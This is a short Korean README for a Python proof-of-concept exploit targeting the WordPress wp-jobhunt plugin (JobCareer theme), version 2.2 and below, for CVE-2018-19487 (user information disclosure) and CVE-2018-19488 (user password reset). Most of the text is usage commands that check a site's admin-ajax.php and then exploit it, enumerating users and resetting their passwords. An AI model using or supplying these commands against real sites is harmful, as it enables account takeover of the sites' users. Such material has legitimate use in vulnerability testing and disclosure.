
CVE-2018-19487, CVE-2018-19488, WordPress wp-jobhunt 플러그인에 대한 익스플로잇
CVE-2018-19487, CVE-2018-19488, WordPress wp-jobhunt 플러그인용 익스플로잇
wp-jobhunt 플러그인은 JobCareer 테마와 함께 사용되는 플러그인입니다:
https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636 (하단의 변경 로그 참조)
CVE-2018-19487 (AJAX 사용자 정보 노출) 및 CVE-2018-19488 (AJAX 사용자 비밀번호 재설정)에 대한 Python 익스플로잇, 버전 2.2 이하 대상.
요구 사항:
사용 방법:
사용자 열거 취약점 확인:
python poc.py --checkenum https://wpsite/path/to/wp-admin/admin-ajax.php
사용자 비밀번호 재설정 취약점 확인:
python poc.py --checkreset https://wpsite/path/to/wp-admin/admin-ajax.php
사용자 열거 익스플로잇:
python poc.py --enum https://wpsite/path/to/wp-admin/admin-ajax.php
사용자 비밀번호 재설정 익스플로잇:
python poc.py --reset https://wpsite/path/to/wp-admin/admin-ajax.php